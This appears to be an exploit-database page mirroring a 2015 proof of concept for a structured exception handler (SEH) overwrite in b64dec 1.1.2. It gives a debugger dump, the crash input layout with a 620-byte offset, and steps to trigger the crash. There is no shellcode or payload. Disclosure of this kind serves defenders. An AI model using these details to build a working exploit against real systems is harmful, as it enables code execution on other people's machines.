header-logo
Suggest Exploit
vendor:
b64dec
by:
Un_N0n
7,8
CVSS
HIGH
SEH OverWrite
119
CWE
Product Name: b64dec
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: YES
Related CWE: N/A
CPE: 4mhz.de/b64dec.html
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x64(64bit)
2015

b64dec SEH OverWrite

Software Crashes due to SEH Over-Write. The exploit involves overwriting the SEH and NSEH pointers with AAAAAAAA. The offset is 620.

Mitigation:

Ensure that the application is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

********************************************************************************************
# Exploit: b64dec SEH OverWrite.
# Date: 12/18/2015
# Exploit Author: Un_N0n
# Vendor: Tim Rohlfs
# Software Link: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Tested on: Windows 7 x64(64bit)
********************************************************************************************

[Dump]

SEH chain of thread 00000EC0
Address    SE handler
024CFC50   b64dec.00458140
024CFC5C   b64dec.004581B3
024CFF28   b64dec.0045847C
024CFF00   41414141               <-------
41414141   *** CORRUPT ENTRY ***  <-------
----------------------------------------------------
024CFEE4   41414141  AAAA
024CFEE8   41414141  AAAA
024CFEEC   41414141  AAAA
024CFEF0   41414141  AAAA
024CFEF4   41414141  AAAA
024CFEF8   41414141  AAAA
024CFEFC   41414141  AAAA
024CFF00   41414141  AAAA  Pointer to next SEH record  <-----
024CFF04   41414141  AAAA  SE handler                  <----- 
024CFF08   41414141  AAAA
024CFF0C   41414141  AAAA
024CFF10   41414141  AAAA
024CFF14   41414141  AAAA
024CFF18   41414141  AAAA


[How to?]
1 - Open up b64dec.exe
2 - In Search field, paste in the contents of Crash.txt
3 - Hit 'Decode'

~ Software Crashes due to SEH Over-Write.

[Crash.txt?]
AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD

--------------------------------------|-----|
									 NSEH  SEH

[Extra Info]
Offset = 620
********************************************************************************************

Navigation

Suggest Exploit

Services By CQR